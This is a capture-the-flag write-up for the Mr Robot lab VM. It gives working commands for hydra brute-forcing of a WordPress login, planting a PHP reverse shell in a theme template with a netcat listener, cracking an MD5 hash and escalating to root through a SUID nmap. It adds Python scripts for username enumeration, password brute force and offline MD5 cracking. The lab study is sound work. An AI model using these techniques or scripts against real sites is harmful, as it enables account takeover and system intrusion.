Mr Robot CTF¶
This is the first CTF I successfully went through. I followed exactly the steps Alexi
Here I go through it quickly with some brief explanations.
Preparation Work¶
Target system Mr Robot running.
Kali Linux with its toolbox running.
Both systems run on VirtualBox, on the same virtual network, and can reach each other.
Attack¶
Get The IP Address of The Target Machine¶
The methods we can use are nmap, netdiscover, or simply the router's DHCP lease table :) .
nmap -F <ip range> # -F stands for "fast": only the 100 most common ports are scanned
netdiscover -r <ip range> [-i interface] # ARP scan of the local segment
For example:
nmap -F 192.168.1.0/24
netdiscover -r 192.168.1.0/24 -i eth0
In my setup, the IP address of the target machine is `192.168.31.224`. Yours will differ; substitute it in all commands below.
Gather Information¶
Use the browser to access the IP address and enjoy the fancy interface!
However, we need a scanner to collect more detailed and useful information. Here we use nikto:
nikto -h 192.168.31.224 # -h specifies the host to scan
The interesting findings are:
A `robots.txt` file.
The website runs on WordPress. The administrator login page is `/wp-login.php`.
Key 1¶
The information about key 1 lies in `robots.txt`: it lists two files, `fsocity.dic` and `key-1-of-3.txt`. Download both.
The file at `192.168.31.224/key-1-of-3.txt` has the key.
The file at `192.168.31.224/fsocity.dic` is a dictionary (wordlist), which we will need in the next step.
Key 2¶
Log In¶
In Gather Information we found the login page of the website, and we now have a dictionary; the next step is to find the username and password.
A useful property of WordPress is that its login error message differs: if the username does not exist it says "Invalid username", and if the user exists but the password is wrong it says "The password you entered for the username ... is incorrect". This is good for us, because we do not need to brute-force the username and the password at the same time: we can enumerate the username first, then the password.
The first tool we use is Burp Suite. Set up the browser proxy and intercept the request sent when hitting the Login button; the POST body has the pattern log=username&pwd=password&wp-submit=Log+In. These are the parameter names hydra has to fill in.
The second tool, used to crack the username, is hydra. Remember the dictionary we just downloaded? We are going to use it to break both the username and the password.
The syntax of hydra's http-post-form module is
hydra -V -L [username list file] -P [password list file] <target ip> http-post-form '<login path>:<post body with ^USER^ and ^PASS^>:F=<string that appears in the response on a failed attempt>'
If you already know the username or the password, replace the uppercase letter (L or P) with the lowercase letter (l or p) and give the single value instead of a file. The F= condition tells hydra what a failure looks like; any response that does not contain that string counts as a hit.
Now break the username with the original dictionary. The password is a dummy; a hit is any username for which the page does not answer "Invalid username":
hydra -V -L fsocity.dic -p testpwd 192.168.31.224 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
The username is `Elliot`. Aha! It's the hero of the TV show "Mr. Robot".
To reduce the number of attempts, sort the list and remove duplicates (the original dictionary is mostly duplicates):
sort -u fsocity.dic > cleaned.dic # sort -u already removes duplicates; no separate uniq or cat is needed
Now break the password. The failure string is now the wrong-password message:
hydra -V -l Elliot -P cleaned.dic 192.168.31.224 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
The password is `ER28-0652`. It is Elliot's employee ID in the show.
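The two hydra runs above are one procedure: enumerate a username by its error message, then attack only that user's password. The script below is an added example (not part of the original writeup) that implements the same logic in Python. The HTTP transport is injected as a callable, so it runs offline against a constructed stand-in for wp-login.php (`make_fake_wp`, with a constructed account map); to use it against a real target, pass a function that POSTs the body to `/wp-login.php` and returns `(status, headers, body)`.

```python
"""Two-phase WordPress login attack: find a valid username first, then
brute-force only that user's password.

Added example, not part of the original writeup. The transport is injected
so the code runs offline against constructed responses (make_fake_wp).
"""
from urllib.parse import parse_qs, urlencode

# Distinguishing fragments of the two wp-login.php error messages.
NO_USER_MARK = "Invalid username"
BAD_PASS_MARK = "is incorrect"


def build_login_body(user: str, password: str) -> str:
    """The POST body hydra fills in: log=^USER^&pwd=^PASS^&wp-submit=Log+In."""
    return urlencode({"log": user, "pwd": password, "wp-submit": "Log In"})


def classify(status: int, headers: dict, body: str) -> str:
    """Map one wp-login.php response to an outcome. A successful login is a
    redirect that sets the wordpress_logged_in_* cookie; failures are told
    apart by the error text, which is what hydra's F= condition matches."""
    if status == 302 and "wordpress_logged_in" in headers.get("Set-Cookie", ""):
        return "success"
    if NO_USER_MARK in body:
        return "no_such_user"
    if BAD_PASS_MARK in body:
        return "wrong_password"
    return "unknown"


def enumerate_users(post, candidates):
    """Phase 1: send every candidate with a dummy password. Users that come
    back 'wrong_password' exist. Equivalent to hydra -L list -p testpwd."""
    found = []
    for user in dict.fromkeys(candidates):  # dedupe like sort -u, keep order
        if classify(*post(build_login_body(user, "testpwd"))) == "wrong_password":
            found.append(user)
    return found


def crack_password(post, user, wordlist):
    """Phase 2: try each unique word as the known user's password.
    Equivalent to hydra -l user -P cleaned.dic."""
    for word in dict.fromkeys(wordlist):
        if classify(*post(build_login_body(user, word))) == "success":
            return word
    return None


def make_fake_wp(accounts):
    """Constructed stand-in for the target: a WordPress login that knows the
    given {username: password} map and answers the way wp-login.php does."""
    def post(body):
        form = parse_qs(body)
        user = form.get("log", [""])[0]
        password = form.get("pwd", [""])[0]
        if user not in accounts:
            return 200, {}, f'<div id="login_error"><strong>ERROR</strong>: {NO_USER_MARK}.</div>'
        if accounts[user] != password:
            return 200, {}, (f'<div id="login_error"><strong>ERROR</strong>: The password you '
                             f'entered for the username <strong>{user}</strong> {BAD_PASS_MARK}.</div>')
        return 302, {"Location": "/wp-admin/",
                     "Set-Cookie": "wordpress_logged_in_abc=...; HttpOnly"}, ""
    return post


if __name__ == "__main__":
    # Constructed demo: a short "dictionary" stands in for fsocity.dic.
    post = make_fake_wp({"Elliot": "ER28-0652"})
    words = ["admin", "Elliot", "mrrobot", "ER28-0652", "Elliot", "password"]
    users = enumerate_users(post, words)
    print("valid users:", users)
    for u in users:
        print(u, "->", crack_password(post, u, words))
```

The point to take from `classify` is that the three outcomes are separable by response content alone, which is exactly why hydra's `F=` string can be different for the two phases; on a site that returns a single generic error for both cases, phase 1 would find nothing and the attack would have to brute-force both fields at once.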
Now we can log in, and Elliot is an administrator. Perfect! But we still need to go through some more steps.
Get the Shell¶
Our idea is to insert a PHP reverse shell into one of the theme's template files and use netcat to listen for the reverse connection.
Search for the keywords "reverse shell php" and copy a usable result; I used the one from Reverse Shell Cheat Sheet | pentestmonkey. Remember to replace the IP address in the script with your Kali Linux IP and note the port. The template I chose is the theme's 404 page, and the port is 1234.
Find `Appearance->Editor` in the left toolbar and choose a template file on the right (here, 404.php). Paste the reverse shell code into the file's source and save it.
Open two terminals. The first runs a `netcat` listener waiting for the reverse connection from the website; the second requests a page that renders the modified template, for example with curl. A URL that does not exist on the site (such as /404.php at the web root) is served with the theme's 404 template, so the request below triggers the payload:
netcat -lvp 1234 # listen on port 1234 (-l listen, -v verbose, -p port)
curl http://192.168.31.224/404.php
Now we have a shell, but not a proper tty yet. Try
python -c 'import pty; pty.spawn("/bin/sh")'
In `/home/robot/` we see `key-2-of-3.txt` and `password.raw-md5`. We cannot read the key file (it is readable only by robot), but we can read password.raw-md5, which holds an unsalted MD5 of robot's password. Use any MD5 cracker, for example CrackStation online or a local wordlist attack; the plaintext is abcdefghijklmnopqrstuvwxyz.
Change user to `robot`:
su robot # enter the password you got
Now you can read the second key.
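Instead of pasting the hash into an online service (fine for a CTF, not for a client's real hashes), the same crack can be done locally. The script below is an added example, not part of the original writeup: it parses the `user:hash` format of password.raw-md5 and runs a wordlist attack with a few cheap mangling rules. The file contents and the tiny wordlist are constructed for the demo (the hash shown is the MD5 of the lowercase alphabet); for the real run, read `fsocity.dic` or `cleaned.dic` instead.

```python
"""Offline wordlist attack on raw (unsalted) MD5 hashes in user:hash form.

Added example, not part of the original writeup. PASSWORD_FILE and WORDLIST
are constructed for the demo; feed the real password.raw-md5 and dictionary
for an actual run.
"""
import hashlib

# Constructed copy of the user:hash file format.
PASSWORD_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"
# Constructed mini-wordlist standing in for cleaned.dic.
WORDLIST = ["password", "Elliot", "ER28-0652", "abcdefghijklmnopqrstuvwxyz", "fsociety"]

HEX = set("0123456789abcdef")


def parse_raw_md5(text: str) -> dict:
    """Parse user:hexdigest lines into {user: digest}, rejecting anything
    that is not a 32-hex-digit MD5 so a mangled file fails loudly."""
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, digest = line.partition(":")
        digest = digest.strip().lower()
        if len(digest) != 32 or not set(digest) <= HEX:
            raise ValueError(f"line {lineno}: {digest!r} is not a raw MD5 digest")
        entries[user] = digest
    return entries


def mangle(word: str):
    """A few cheap rule variants per word; real crackers apply many more."""
    yield word
    yield word.lower()
    yield word.capitalize()
    yield word.upper()


def crack_md5(targets: dict, wordlist, rules=True) -> dict:
    """Return {user: plaintext} for every target found. Because the hashes are
    unsalted, each candidate is hashed once and looked up against all targets,
    so a file with many users costs the same as cracking one hash."""
    wanted = {digest: user for user, digest in targets.items()}
    found = {}
    for word in dict.fromkeys(wordlist):  # dedupe like sort -u, keep order
        for cand in (mangle(word) if rules else (word,)):
            h = hashlib.md5(cand.encode()).hexdigest()
            if h in wanted and wanted[h] not in found:
                found[wanted[h]] = cand
                if len(found) == len(wanted):
                    return found
    return found


if __name__ == "__main__":
    targets = parse_raw_md5(PASSWORD_FILE)
    print(crack_md5(targets, WORDLIST))  # {'robot': 'abcdefghijklmnopqrstuvwxyz'}
```

The single-hash-per-candidate lookup in `crack_md5` is the whole reason unsalted MD5 is so weak here: a salt would force one hash computation per candidate per user and defeat precomputed tables like the one CrackStation uses.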
Key 3¶
User `robot` is not the root user. We need a way to get root access. The idea is to find a program that runs with root privileges (SUID root) and can be made to execute commands, for example through an interactive mode.
The first step is to list the binaries that run with the owner's privileges:
find / -perm -4000 2>/dev/null # -perm -4000: files with the setuid bit set, so they run as their owner (here root). 2>/dev/null sends error messages (permission denied etc.) to /dev/null, i.e. hides them; 2 is the stderr stream
We find `nmap`! This is an old nmap build that still has an interactive mode (removed in version 5.21), and inside that mode `!` runs a shell command.
Execute
nmap --interactive
and at the nmap> prompt spawn a shell:
!sh
Because nmap is SUID root, the shell runs as root (verify with whoami). Now enter the `/root` directory and read the third key file, key-3-of-3.txt:
cat /root/key-3-of-3.txt